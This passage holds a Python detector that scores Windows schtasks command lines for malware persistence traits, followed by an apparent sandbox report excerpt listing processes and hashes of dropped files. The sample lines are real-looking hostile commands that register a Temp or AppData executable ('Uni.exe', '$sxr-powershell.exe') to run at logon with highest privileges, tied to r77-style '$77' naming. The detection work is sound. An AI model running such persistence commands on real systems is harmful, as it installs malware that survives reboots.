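        key = toks[i].lower()
        if key in _VALUE_OPTS and i + 1 < len(toks):
            opts[key] = toks[i + 1]
            i += 2
        else:
            opts["_flags"].append(key)
            i += 1
    return opts


def assess(cmdline):
    """Score one command line. Returns None for non-schtasks or non-/create
    lines, otherwise the task name, target and the traits matched."""
    opts = parse_schtasks(cmdline)
    if opts is None or "/create" not in opts["_flags"]:
        return None
    name = opts.get("/tn", "")
    # The $77Uni.exe line wraps the path in single quotes inside the double
    # quotes; strip those too.
    target = opts.get("/tr", "").strip("'")
    reasons = []
    if opts.get("/sc", "").upper() == "ONLOGON":
        reasons.append("triggers at logon")
    if opts.get("/rl", "").upper() == "HIGHEST":
        reasons.append("requests highest run level")
    if _USER_WRITABLE.search(target):
        reasons.append("target lives in a user-writable directory")
    # Both task names on this page start with '$'; '$77' is the prefix the r77
    # rootkit uses to mark entities it hides (general knowledge, not something
    # the report itself states).
    if name.startswith("$"):
        reasons.append("task name starts with '$'")
    return {
        "task": name,
        "target": target,
        "reasons": reasons,
        "suspicious": len(reasons) >= 3,
    }


SAMPLE_CMDLINES = [
    '"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\Uni.exe" /rl HIGHEST /f',
    '"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr '
    '"C:\\Users\\Admin\\AppData\\Roaming\\$sxr-seroxen2\\$sxr-powershell.exe" /rl HIGHEST /f',
    '"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr '
    '"\'C:\\Users\\Admin\\AppData\\Local\\Temp\\Uni.exe\'" /sc onlogon /rl HIGHEST',
    # Constructed benign line for contrast.
    'schtasks /create /tn "NightlyBackup" /sc DAILY /st 02:00 '
    '/tr "C:\\Program Files\\Backup\\run.exe"',
]


def scan(cmdlines):
    """Run assess() over a batch and keep only the suspicious hits."""
    return [r for r in map(assess, cmdlines) if r and r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit["task"], "->", hit["target"], "|", "; ".join(hit["reasons"]))
```

The `/sc` and `/rl` values are compared case-insensitively on purpose: the first two lines use `ONLOGON`, the third `onlogon`, and a rule that matches only one spelling misses a third of this sample's persistence.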
- PID 3688: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- PID 3868: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- PID 4020: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
- PID 2372: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 4376: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 4180: C:\Windows\system32\SppExtComObj.exe -Embedding
- PID 3776: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- PID 4980: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- PID 756: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- PID 2552: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
- PID 3512: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- PID 5000: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- PID 4876: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- PID 4320: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 1644: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
- PID 636: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- PID 3412: C:\Windows\system32\BackgroundTransferHost.exe (cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1)
- PID 4700: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 162KB
MD5: 152e3f07bbaf88fb8b097ba05a60df6e
SHA1: c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Filesize: 409KB (same hashes as the submitted Uni.exe)
MD5: 7417c8c73e614f293152575f46134216
SHA1: cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA256: 00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512: 897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Filesize: 412B
MD5: 4fbd4d87af338fa7b3d43a611231603e
SHA1: 0588e60b8c334785ef21e346bdca446e5f38464b
SHA256: e9d08ab02bf535211eb0583061c47b4276bd866b639f06137993e7fc6d11e186
SHA512: 63f6396ce7e153f48733d3649dbbc8f193e4121de68f7b9c1088566e3559abd71fcb8b320c4e4b1c2c86a4862f9cb2e8b77f610feea491a0e41f372e7f7dcaa4

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 332B
MD5: 7797053c50e2dc8a7a685359cb724b3b
SHA1: 3c19b667e3277e1275779709f6da6769c3d9d688
SHA256: 57975687d822833ecb3ffd00e81e8c1b90f5c4463ce6ca7cd3a957a50054a5be
SHA512: 639bce4423e77f0e0dc8570efe010cdd96b6bb334e519c4f1df6e8e4f3d6aee5f6c1041c15c08279f6748ad6dca997e2e5e610956904e5b66f9088a33a94b5f9